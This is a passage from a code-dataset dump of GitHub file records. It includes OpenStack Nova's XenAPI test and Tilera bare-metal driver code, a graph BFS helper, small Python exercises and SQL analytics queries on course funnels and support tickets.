BOOM!\n\tdef bfs(self, s, dist):\n\t\tdist[s] = 0\n\t\tQ = deque([s])\n\t\twhile (len(Q) > 0):\n\t\t\tu = Q.popleft()\n\t\t\tfor v in self.getNeighbors(u):\n\t\t\t\tif (v not in dist):\n\t\t\t\t\tQ.append(v)\n\t\t\t\t\tdist[v] = dist[u]+1\n\n\t\t\n\n\n\n\ndef trygraph():\n\tG = DGraph({})\n\t\n\tG.addNode('a')\n\t\n\tG.addNode('b')\n\t\n\tG.addNode('c')\n\t\n\tG.addNode('d')\n\t\n\tG.addNode('e')\n\t\n\t\n\t\n\tG.addEdge('a', 'b', 1)\n\t\n\tG.addEdge('a', 'd', 1)\n\t\n\tG.addEdge('b', 'c', 1)\n\t\n\tG.addEdge('e', 'b', 1)\n\t\n\tG.addEdge('e', 'd', 1)\n\t\n\treturn G\n\n\n\n"
}
] | 1 |
stryng/nova | https://github.com/stryng/nova | 103b8e7cd620c1421a0ff1168f139ed0c77337b7 | 5dba32a23e67341bfdc03a00781ab491238e21f4 | fac13c773fbaeb2a3aae784e2c5096f13d0189ca | refs/heads/master | 2021-01-15T18:09:25.444410 | 2013-05-11T00:19:11 | 2013-05-11T00:19:11 | 10,013,535 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.630652904510498,
"alphanum_fraction": 0.6328136920928955,
"avg_line_length": 37.56547546386719,
"blob_id": "f1dfcdf8ec449fe91a14ce074b67c1d2ea78a9a2",
"content_id": "18a444f410d715b3e6ff84685ea6628905432b60",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6479,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 168,
"path": "/nova/tests/virt/xenapi/test_vmops.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom nova.compute import task_states\nfrom nova.compute import vm_mode\nfrom nova import test\nfrom nova.virt import fake\nfrom nova.virt.xenapi import vm_utils\nfrom nova.virt.xenapi import vmops\n\n\nclass VMOpsTestCase(test.TestCase):\n def setUp(self):\n super(VMOpsTestCase, self).setUp()\n self._setup_mock_vmops()\n\n def _setup_mock_vmops(self, product_brand=None, product_version=None):\n self._session = self._get_mock_session(product_brand, product_version)\n self._vmops = vmops.VMOps(self._session, fake.FakeVirtAPI())\n\n def _get_mock_session(self, product_brand, product_version):\n class Mock(object):\n pass\n\n mock_session = Mock()\n mock_session.product_brand = product_brand\n mock_session.product_version = product_version\n return mock_session\n\n def test_check_resize_func_name_defaults_to_VDI_resize(self):\n self.assertEquals(\n 'VDI.resize',\n self._vmops.check_resize_func_name())\n\n def _test_finish_revert_migration_after_crash(self, backup_made, new_made):\n instance = {'name': 'foo',\n 'task_state': task_states.RESIZE_MIGRATING}\n\n self.mox.StubOutWithMock(vm_utils, 'lookup')\n self.mox.StubOutWithMock(self._vmops, '_destroy')\n self.mox.StubOutWithMock(vm_utils, 'set_vm_name_label')\n self.mox.StubOutWithMock(self._vmops, '_attach_mapped_block_devices')\n self.mox.StubOutWithMock(self._vmops, '_start')\n\n vm_utils.lookup(self._session, 'foo-orig').AndReturn(\n backup_made and 'foo' or None)\n vm_utils.lookup(self._session, 'foo').AndReturn(\n (not backup_made or new_made) and 'foo' or None)\n if backup_made:\n if new_made:\n self._vmops._destroy(instance, 'foo')\n vm_utils.set_vm_name_label(self._session, 'foo', 'foo')\n self._vmops._attach_mapped_block_devices(instance, [])\n self._vmops._start(instance, 'foo')\n\n self.mox.ReplayAll()\n\n self._vmops.finish_revert_migration(instance, [])\n\n def test_finish_revert_migration_after_crash(self):\n self._test_finish_revert_migration_after_crash(True, True)\n\n def test_finish_revert_migration_after_crash_before_new(self):\n self._test_finish_revert_migration_after_crash(True, False)\n\n def test_finish_revert_migration_after_crash_before_backup(self):\n self._test_finish_revert_migration_after_crash(False, False)\n\n def test_determine_vm_mode_returns_xen(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n\n fake_instance = \"instance\"\n vm_mode.get_from_instance(fake_instance).AndReturn(vm_mode.XEN)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.XEN,\n self._vmops._determine_vm_mode(fake_instance, None, None))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_hvm(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n\n fake_instance = \"instance\"\n vm_mode.get_from_instance(fake_instance).AndReturn(vm_mode.HVM)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n self._vmops._determine_vm_mode(fake_instance, None, None))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_pv(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'root': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n vm_utils.determine_is_pv(self._session, \"fake\", fake_disk_type,\n \"foo\").AndReturn(True)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.XEN,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_not_pv(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'root': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n vm_utils.determine_is_pv(self._session, \"fake\", fake_disk_type,\n \"foo\").AndReturn(False)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_determine_vm_mode_returns_is_not_pv_no_root_disk(self):\n self.mox.StubOutWithMock(vm_mode, 'get_from_instance')\n self.mox.StubOutWithMock(vm_utils, 'determine_is_pv')\n\n fake_instance = {\"os_type\": \"foo\"}\n fake_vdis = {'iso': {\"ref\": 'fake'}}\n fake_disk_type = \"disk\"\n vm_mode.get_from_instance(fake_instance).AndReturn(None)\n\n self.mox.ReplayAll()\n self.assertEquals(vm_mode.HVM,\n self._vmops._determine_vm_mode(fake_instance, fake_vdis,\n fake_disk_type))\n self.mox.VerifyAll()\n\n def test_xsm_sr_check_relaxed_cached(self):\n self.make_plugin_call_count = 0\n\n def fake_make_plugin_call(plugin, method, **args):\n self.make_plugin_call_count = self.make_plugin_call_count + 1\n return \"true\"\n\n self.stubs.Set(self._vmops, \"_make_plugin_call\",\n fake_make_plugin_call)\n\n self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())\n self.assertTrue(self._vmops._is_xsm_sr_check_relaxed())\n\n self.assertEqual(self.make_plugin_call_count, 1)\n"
},
{
"alpha_fraction": 0.6271790862083435,
"alphanum_fraction": 0.6315372586250305,
"avg_line_length": 29.409639358520508,
"blob_id": "0bcd71df91843633b1bcd2a6dfec93255873e4c1",
"content_id": "b18bfac857b584aafbfcd16da4c98a285521d12b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2524,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 83,
"path": "/nova/virt/baremetal/utils.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2012 NTT DOCOMO, INC.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport errno\nimport os\nimport shutil\n\nfrom nova.openstack.common import log as logging\nfrom nova.virt.disk import api as disk_api\nfrom nova.virt.libvirt import utils as libvirt_utils\n\nLOG = logging.getLogger(__name__)\n\n\ndef cache_image(context, target, image_id, user_id, project_id):\n if not os.path.exists(target):\n libvirt_utils.fetch_image(context, target, image_id,\n user_id, project_id)\n\n\ndef inject_into_image(image, key, net, metadata, admin_password,\n files, partition, use_cow=False):\n try:\n disk_api.inject_data(image, key, net, metadata, admin_password,\n files, partition, use_cow)\n except Exception as e:\n LOG.warn(_(\"Failed to inject data into image %(image)s. \"\n \"Error: %(e)s\") % locals())\n\n\ndef unlink_without_raise(path):\n try:\n os.unlink(path)\n except OSError as e:\n if e.errno == errno.ENOENT:\n return\n else:\n LOG.warn(_(\"Failed to unlink %(path)s, error: %(e)s\") % locals())\n\n\ndef rmtree_without_raise(path):\n try:\n if os.path.isdir(path):\n shutil.rmtree(path)\n except OSError as e:\n LOG.warn(_(\"Failed to remove dir %(path)s, error: %(e)s\") % locals())\n\n\ndef write_to_file(path, contents):\n with open(path, 'w') as f:\n f.write(contents)\n\n\ndef create_link_without_raise(source, link):\n try:\n os.symlink(source, link)\n except OSError as e:\n if e.errno == errno.EEXIST:\n return\n else:\n LOG.warn(_(\"Failed to create symlink from %(source)s to %(link)s\"\n \", error: %(e)s\") % locals())\n\n\ndef random_alnum(count):\n import random\n import string\n chars = string.ascii_uppercase + string.digits\n return \"\".join(random.choice(chars) for _ in range(count))\n"
},
{
"alpha_fraction": 0.5718938112258911,
"alphanum_fraction": 0.5758436918258667,
"avg_line_length": 35.258792877197266,
"blob_id": "c5f9296ec49439f2e7f38b172a59d1ed9f3b9cd6",
"content_id": "d9a065bf10d44b27edfacb5d234841ff0f2026f7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14431,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 398,
"path": "/nova/virt/baremetal/tilera.py",
"repo_name": "stryng/nova",
"src_encoding": "UTF-8",
"text": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright (c) 2011-2013 University of Southern California / ISI\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nClass for Tilera bare-metal nodes.\n\"\"\"\n\nimport base64\nimport os\n\nfrom oslo.config import cfg\n\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova.openstack.common.db import exception as db_exc\nfrom nova.openstack.common import fileutils\nfrom nova.openstack.common import log as logging\nfrom nova import utils\nfrom nova.virt.baremetal import baremetal_states\nfrom nova.virt.baremetal import base\nfrom nova.virt.baremetal import db\nfrom nova.virt.baremetal import utils as bm_utils\n\ntilera_opts = [\n cfg.StrOpt('net_config_template',\n default='$pybasedir/nova/virt/baremetal/'\n 'net-dhcp.ubuntu.template',\n help='Template file for injected network config'),\n ]\n\nLOG = logging.getLogger(__name__)\n\nbaremetal_group = cfg.OptGroup(name='baremetal',\n title='Baremetal Options')\n\nCONF = cfg.CONF\nCONF.register_group(baremetal_group)\nCONF.register_opts(tilera_opts, baremetal_group)\nCONF.import_opt('use_ipv6', 'nova.netconf')\n\nCHEETAH = None\n\n\ndef _get_cheetah():\n global CHEETAH\n if CHEETAH is None:\n from Cheetah import Template\n CHEETAH = Template.Template\n return CHEETAH\n\n\ndef build_network_config(network_info):\n try:\n assert isinstance(network_info, list)\n except AssertionError:\n network_info = [network_info]\n interfaces = []\n for id, (network, mapping) in enumerate(network_info):\n address_v6 = None\n gateway_v6 = None\n netmask_v6 = None\n if CONF.use_ipv6:\n address_v6 = mapping['ip6s'][0]['ip']\n netmask_v6 = mapping['ip6s'][0]['netmask']\n gateway_v6 = mapping['gateway_v6']\n interface = {\n 'name': 'eth%d' % id,\n 'address': mapping['ips'][0]['ip'],\n 'gateway': mapping['gateway'],\n 'netmask': mapping['ips'][0]['netmask'],\n 'dns': ' '.join(mapping['dns']),\n 'address_v6': address_v6,\n 'gateway_v6': gateway_v6,\n 'netmask_v6': netmask_v6,\n }\n interfaces.append(interface)\n\n cheetah = _get_cheetah()\n network_config = str(cheetah(\n open(CONF.baremetal.net_config_template).read(),\n searchList=[\n {'interfaces': interfaces,\n 'use_ipv6': CONF.use_ipv6,\n }\n ]))\n return network_config\n\n\ndef get_image_dir_path(instance):\n \"\"\"Generate the dir for an instances disk.\"\"\"\n return os.path.join(CONF.instances_path, instance['name'])\n\n\ndef get_image_file_path(instance):\n \"\"\"Generate the full path for an instances disk.\"\"\"\n return os.path.join(CONF.instances_path, instance['name'], 'disk')\n\n\ndef get_tilera_nfs_path(node_id):\n \"\"\"Generate the path for an instances Tilera nfs.\"\"\"\n tilera_nfs_dir = \"fs_\" + str(node_id)\n return os.path.join(CONF.baremetal.tftp_root, tilera_nfs_dir)\n\n\ndef get_partition_sizes(instance):\n instance_type = flavors.extract_instance_type(instance)\n root_mb = instance_type['root_gb'] * 1024\n swap_mb = instance_type['swap']\n\n if swap_mb < 1:\n swap_mb = 1\n\n return (root_mb, swap_mb)\n\n\ndef get_tftp_image_info(instance):\n \"\"\"\n Generate the paths for tftp files for this instance.\n\n Raises NovaException if\n - instance does not contain kernel_id\n \"\"\"\n image_info = {\n 'kernel': [None, None],\n }\n try:\n image_info['kernel'][0] = str(instance['kernel_id'])\n except KeyError as e:\n pass\n\n missing_labels = []\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n if not uuid:\n missing_labels.append(label)\n else:\n image_info[label][1] = os.path.join(CONF.baremetal.tftp_root,\n instance['uuid'], label)\n if missing_labels:\n raise exception.NovaException(_(\n \"Can not activate Tilera bootloader. \"\n \"The following boot parameters \"\n \"were not passed to baremetal driver: %s\") % missing_labels)\n return image_info\n\n\nclass Tilera(base.NodeDriver):\n \"\"\"Tilera bare metal driver.\"\"\"\n\n def __init__(self, virtapi):\n super(Tilera, self).__init__(virtapi)\n\n def _collect_mac_addresses(self, context, node):\n macs = set()\n for nic in db.bm_interface_get_all_by_bm_node_id(context, node['id']):\n if nic['address']:\n macs.add(nic['address'])\n return sorted(macs)\n\n def _cache_tftp_images(self, context, instance, image_info):\n \"\"\"Fetch the necessary kernels and ramdisks for the instance.\"\"\"\n fileutils.ensure_tree(\n os.path.join(CONF.baremetal.tftp_root, instance['uuid']))\n\n LOG.debug(_(\"Fetching kernel and ramdisk for instance %s\") %\n instance['name'])\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n bm_utils.cache_image(\n context=context,\n target=path,\n image_id=uuid,\n user_id=instance['user_id'],\n project_id=instance['project_id'],\n )\n\n def _cache_image(self, context, instance, image_meta):\n \"\"\"Fetch the instance's image from Glance\n\n This method pulls the relevant AMI and associated kernel and ramdisk,\n and the deploy kernel and ramdisk from Glance, and writes them\n to the appropriate places on local disk.\n\n Both sets of kernel and ramdisk are needed for Tilera booting, so these\n are stored under CONF.baremetal.tftp_root.\n\n At present, the AMI is cached and certain files are injected.\n Debian/ubuntu-specific assumptions are made regarding the injected\n files. In a future revision, this functionality will be replaced by a\n more scalable and os-agnostic approach: the deployment ramdisk will\n fetch from Glance directly, and write its own last-mile configuration.\n \"\"\"\n fileutils.ensure_tree(get_image_dir_path(instance))\n image_path = get_image_file_path(instance)\n\n LOG.debug(_(\"Fetching image %(ami)s for instance %(name)s\") %\n {'ami': image_meta['id'], 'name': instance['name']})\n bm_utils.cache_image(context=context,\n target=image_path,\n image_id=image_meta['id'],\n user_id=instance['user_id'],\n project_id=instance['project_id']\n )\n\n return [image_meta['id'], image_path]\n\n def _inject_into_image(self, context, node, instance, network_info,\n injected_files=None, admin_password=None):\n \"\"\"Inject last-mile configuration into instances image\n\n Much of this method is a hack around DHCP and cloud-init\n not working together with baremetal provisioning yet.\n \"\"\"\n partition = None\n if not instance['kernel_id']:\n partition = \"1\"\n\n ssh_key = None\n if 'key_data' in instance and instance['key_data']:\n ssh_key = str(instance['key_data'])\n\n if injected_files is None:\n injected_files = []\n else:\n injected_files = list(injected_files)\n\n net_config = build_network_config(network_info)\n\n if instance['hostname']:\n injected_files.append(('/etc/hostname', instance['hostname']))\n\n LOG.debug(_(\"Injecting files into image for instance %(name)s\") %\n {'name': instance['name']})\n\n bm_utils.inject_into_image(\n image=get_image_file_path(instance),\n key=ssh_key,\n net=net_config,\n metadata=instance['metadata'],\n admin_password=admin_password,\n files=injected_files,\n partition=partition,\n )\n\n def cache_images(self, context, node, instance,\n admin_password, image_meta, injected_files, network_info):\n \"\"\"Prepare all the images for this instance.\"\"\"\n tftp_image_info = get_tftp_image_info(instance)\n self._cache_tftp_images(context, instance, tftp_image_info)\n\n self._cache_image(context, instance, image_meta)\n self._inject_into_image(context, node, instance, network_info,\n injected_files, admin_password)\n\n def destroy_images(self, context, node, instance):\n \"\"\"Delete instance's image file.\"\"\"\n bm_utils.unlink_without_raise(get_image_file_path(instance))\n bm_utils.rmtree_without_raise(get_image_dir_path(instance))\n\n def activate_bootloader(self, context, node, instance):\n \"\"\"Configure Tilera boot loader for an instance\n\n Kernel and ramdisk images are downloaded by cache_tftp_images,\n and stored in /tftpboot/{uuid}/\n\n This method writes the instances config file, and then creates\n symlinks for each MAC address in the instance.\n\n By default, the complete layout looks like this:\n\n /tftpboot/\n ./{uuid}/\n kernel\n ./fs_node_id/\n \"\"\"\n image_info = get_tftp_image_info(instance)\n (root_mb, swap_mb) = get_partition_sizes(instance)\n tilera_nfs_path = get_tilera_nfs_path(node['id'])\n image_file_path = get_image_file_path(instance)\n\n deployment_key = bm_utils.random_alnum(32)\n db.bm_node_update(context, node['id'],\n {'deploy_key': deployment_key,\n 'image_path': image_file_path,\n 'pxe_config_path': tilera_nfs_path,\n 'root_mb': root_mb,\n 'swap_mb': swap_mb})\n\n if os.path.exists(image_file_path) and \\\n os.path.exists(tilera_nfs_path):\n utils.execute('mount', '-o', 'loop', image_file_path,\n tilera_nfs_path, run_as_root=True)\n\n def deactivate_bootloader(self, context, node, instance):\n \"\"\"Delete Tilera bootloader images and config.\"\"\"\n try:\n db.bm_node_update(context, node['id'],\n {'deploy_key': None,\n 'image_path': None,\n 'pxe_config_path': None,\n 'root_mb': 0,\n 'swap_mb': 0})\n except exception.NodeNotFound:\n pass\n\n tilera_nfs_path = get_tilera_nfs_path(node['id'])\n\n if os.path.ismount(tilera_nfs_path):\n utils.execute('rpc.mountd', run_as_root=True)\n utils.execute('umount', '-f', tilera_nfs_path, run_as_root=True)\n\n try:\n image_info = get_tftp_image_info(instance)\n except exception.NovaException:\n pass\n else:\n for label in image_info.keys():\n (uuid, path) = image_info[label]\n bm_utils.unlink_without_raise(path)\n\n try:\n macs = self._collect_mac_addresses(context, node)\n except db_exc.DBError:\n pass\n\n if os.path.exists(os.path.join(CONF.baremetal.tftp_root,\n instance['uuid'])):\n bm_utils.rmtree_without_raise(\n os.path.join(CONF.baremetal.tftp_root, instance['uuid']))\n\n def _iptables_set(self, node_ip, user_data):\n \"\"\"\n Sets security setting (iptables:port) if needed.\n\n iptables -A INPUT -p tcp ! -s $IP --dport $PORT -j DROP\n /tftpboot/iptables_rule script sets iptables rule on the given node.\n \"\"\"\n rule_path = CONF.baremetal.tftp_root + \"/iptables_rule\"\n if user_data is not None:\n open_ip = base64.b64decode(user_data)\n utils.execute(rule_path, node_ip, open_ip)\n\n def activate_node(self, context, node, instance):\n \"\"\"Wait for Tilera deployment to complete.\"\"\"\n\n locals = {'error': '', 'started': False}\n\n try:\n row = db.bm_node_get(context, node['id'])\n if instance['uuid'] != row.get('instance_uuid'):\n locals['error'] = _(\"Node associated with another instance\"\n \" while waiting for deploy of %s\")\n\n status = row.get('task_state')\n if (status == baremetal_states.DEPLOYING and\n locals['started'] == False):\n LOG.info(_('Tilera deploy started for instance %s')\n % instance['uuid'])\n locals['started'] = True\n elif status in (baremetal_states.DEPLOYDONE,\n baremetal_states.BUILDING,\n baremetal_states.ACTIVE):\n LOG.info(_(\"Tilera deploy completed for instance %s\")\n % instance['uuid'])\n node_ip = node['pm_address']\n user_data = instance['user_data']\n try:\n self._iptables_set(node_ip, user_data)\n except Exception as ex:\n self.deactivate_bootloader(context, node, instance)\n raise exception.NovaException(_(\"Node is \"\n \"unknown error state.\"))\n elif status == baremetal_states.DEPLOYFAIL:\n locals['error'] = _(\"Tilera deploy failed for instance %s\")\n except exception.NodeNotFound:\n locals['error'] = _(\"Baremetal node deleted while waiting \"\n \"for deployment of instance %s\")\n\n if locals['error']:\n raise exception.InstanceDeployFailure(\n locals['error'] % instance['uuid'])\n\n def deactivate_node(self, context, node, instance):\n pass\n"
}
] | 3 |
nperera0/coding | https://github.com/nperera0/coding | 4fbb21cc47f93b67a3b1c8e7362fdc47d1562da4 | fa61a9b1fdfbba800ea112ef157653096cb36cb4 | 6cadaecca4fc7044348076fe3d7aeccbef96283e | refs/heads/master | 2023-01-20T04:24:21.477659 | 2020-11-25T14:15:28 | 2020-11-25T14:15:28 | 315,776,071 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7237163782119751,
"alphanum_fraction": 0.7334963083267212,
"avg_line_length": 26.233333587646484,
"blob_id": "b5d2fbc27c2a43dbb3a8e7fcb3b4f6ed3cb6493f",
"content_id": "b1adbd4c3402a72a6d8ece2e564066932aaa9139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 834,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 30,
"path": "/support_tickets.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\nCREATE TABLE events AS (\n user_id INTEGER,\n event_ts TIMESTAMP,\n event_key VARCHAR(255),\n event_value VARCHAR(2000),\n);\n\n- assume this is all events for just one single course\n- assume that event_key = ‘support’ refers to a support event\n- assume that event_key = ‘purchase’ refers to paying for a course.\n\n\nHow do you determine the number of people who end up paying for a course after submitting at least two support tickets?\n\nS\nS\nP\nS\n\nWITH all_support AS (\n SELECT user_id, event_ts FROM events WHERE event_key = ‘support’),\n\nWITH all_purchase AS (\n SELECT user_id, event_ts FROM events WHERE event_key = ‘purchase’),\n\nSELECT user_id FROM all_support JOIN all_purchase\nON all_support.user_id = all_purchase.user_id\nWHERE all_support.event_ts < all_purchase.event_ts\nGROUP BY user_id\nHAVING COUNT(*) > 2\n"
},
{
"alpha_fraction": 0.5837209224700928,
"alphanum_fraction": 0.5883721113204956,
"avg_line_length": 17.69565200805664,
"blob_id": "f8f218bd551eebdfa33459471212f757f1a10792",
"content_id": "ce8696664710f8a62f31fe619185b0c1e6108742",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 23,
"path": "/permutations.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\n Write a function that returns all permutations of a given list.\n'''\n\ndef perm_helper(prefix, suffix, ret):\n if suffix == \"\":\n ret.append(prefix)\n return\n\n for i in range(len(suffix)):\n perm_helper(prefix + suffix[i], suffix[0:i] + suffix[i+1::], ret)\n\n return ret\n\n\ndef permutations(s):\n ret = []\n return perm_helper(\"\", s, ret)\n\nout = permutations(\"abcd\")\n\nfor t in out:\n print(t)\n"
},
{
"alpha_fraction": 0.7509942054748535,
"alphanum_fraction": 0.7601712942123413,
"avg_line_length": 56.35087585449219,
"blob_id": "9f1e92fd9cce2182fda24e7b36fef41d05064778",
"content_id": "d33ac2959499243e6f3ab378600304c7e70359d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3269,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 57,
"path": "/course_progress_funnel.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "WITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\ncourses AS (\nSELECT DISTINCT course_id FROM course-funnel-assignment.data.raw_data),\n\nstarted_cur_7_day AS (\nSELECT dates.date, course_id, module_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id ),\n\nstarted_prev_7_day AS (\nSELECT dates.date, course_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 13 DAY) AND DATE(item_start_ts) <= DATE_SUB(dates.date, INTERVAL 7 DAY)\nGROUP BY dates.date, course_id, user_id ),\n\ncompleted_modules_in_past AS (\nSELECT * EXCEPT (rank) FROM (\n SELECT dates.date, course_id, module_id, user_id, item_complete_ts, DENSE_RANK() OVER (PARTITION BY course_id, module_id, user_id ORDER BY item_complete_ts) AS rank\n FROM `course-funnel-assignment.data.raw_data` JOIN dates\n ON DATE(item_complete_ts) <= dates.date )\nWHERE rank = 4),\n\nweekly_course_actives AS (\nSELECT date, course_id, COUNT(DISTINCT user_id) AS cnt FROM started_cur_7_day\nGROUP BY date, course_id ),\n\nweekly_course_retained_learners AS (\nSELECT cur.date, cur.course_id, COUNT(DISTINCT cur.user_id) AS cnt FROM started_cur_7_day cur JOIN started_prev_7_day prev\nON cur.date = prev.date AND cur.course_id = prev.course_id AND cur.user_id = prev.user_id\nGROUP BY cur.date, cur.course_id ),\n\nweekly_course_progressed_learners AS (\nSELECT cur.date, cur.course_id, COUNT(DISTINCT cur.user_id) AS cnt FROM started_cur_7_day cur JOIN completed_modules_in_past comp\nON cur.date = comp.date AND cur.course_id = comp.course_id\n AND cur.user_id = comp.user_id AND cur.module_id != comp.module_id\nGROUP BY cur.date, cur.course_id ),\n\nweekly_course_passed_learners AS (\nSELECT date, course_id, COUNT(user_id) AS cnt FROM (\n SELECT dates.date, course_id, user_id FROM completed_modules_in_past JOIN dates\n ON DATE(item_complete_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_complete_ts) <= dates.date\n GROUP BY dates.date, course_id, user_id\n HAVING COUNT(module_id) >= 4 )\nGROUP BY date, course_id )\n\nSELECT dates.date, courses.course_id,\n weekly_course_actives.cnt AS Weekly_Course_Actives,\n weekly_course_retained_learners.cnt AS Weekly_Course_Retained_Learners,\n weekly_course_progressed_learners.cnt AS Weekly_Course_Progressed_Learners,\n weekly_course_passed_learners.cnt AS Weekly_Course_Passed_Learners\nFROM dates CROSS JOIN courses\n LEFT JOIN weekly_course_actives ON dates.date = weekly_course_actives.date AND courses.course_id = weekly_course_actives.course_id\n LEFT JOIN weekly_course_retained_learners ON dates.date = weekly_course_retained_learners.date AND courses.course_id = weekly_course_retained_learners.course_id\n LEFT JOIN weekly_course_progressed_learners ON dates.date = weekly_course_progressed_learners.date AND courses.course_id = weekly_course_progressed_learners.course_id\n LEFT JOIN weekly_course_passed_learners ON dates.date = weekly_course_passed_learners.date AND courses.course_id = weekly_course_passed_learners.course_id\nORDER BY dates.date, courses.course_id\n"
},
{
"alpha_fraction": 0.6206896305084229,
"alphanum_fraction": 0.6419098377227783,
"avg_line_length": 17.850000381469727,
"blob_id": "be472eb0e2fdf0e199fe432f8f3a728df449aa1d",
"content_id": "00e5857d8a18b633407a834daa2d0a81c4d811e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 377,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 20,
"path": "/array.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\n returns most frequent number in an array of integers\n'''\n\ndef most_frequent_int(array): # O(n)\n if len(array) == 0:\n return None\n\n dictionary = dict()\n\n for element in array:\n if element in dictionary:\n dictionary[element] += 1\n else:\n dictionary[element] = 1\n\n return max(dictionary, key=dictionary.get)\n\n\nprint(most_frequent_int([1,2,3,4,5]))\n"
},
{
"alpha_fraction": 0.73667311668396,
"alphanum_fraction": 0.7482337951660156,
"avg_line_length": 22.953845977783203,
"blob_id": "355b4108d0d3ae00a97b98954b4fe25a9d9d9814",
"content_id": "380e85cc159f1ab839ec24c5ef685d4f823ad150",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1557,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 65,
"path": "/university_enrollment.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
